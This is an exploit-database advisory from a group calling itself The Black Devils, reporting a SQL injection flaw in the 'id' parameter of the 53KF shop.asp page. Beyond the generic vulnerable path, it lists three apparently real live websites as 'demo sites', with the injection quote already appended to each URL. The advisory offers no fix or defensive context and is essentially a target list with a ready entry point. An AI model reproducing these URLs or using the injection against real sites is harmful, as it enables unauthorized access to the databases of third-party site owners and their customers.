id: 19883
date: 12/04/2012
title: 53KF  sql injection Vulnerability
author: The Black Devils
cves: 

# Exploit Title: 53KF  sql injection Vulnerability
# Date: 05/10/2012
# Author: The Black Devils
# Home: 1337day Exploit DataBase 1337day.com
# Software Link: http://www.53kf.com/
# Category : [ webapps ]
# Dork : use google
# Type : asp
# Tested on: [Windows] & [Ubuntu]

-------------------------------

http:\Localhost\[Path]\shop.asp?id= sql injection

-------------------------------

# Demo site:
http://www.fenhong123.com/eshop/shop.asp?id=1796'
http://www.51sxh.com/shop.asp?id=1216'
http://www.firstaidkitsaustralia.com.au/shop.asp?id=1'



#------------------
Contact:
https://www.facebook.com/DevilsDz
https://www.facebook.com/necesarios
#------------------

#  0day.today [2023-03-22]  #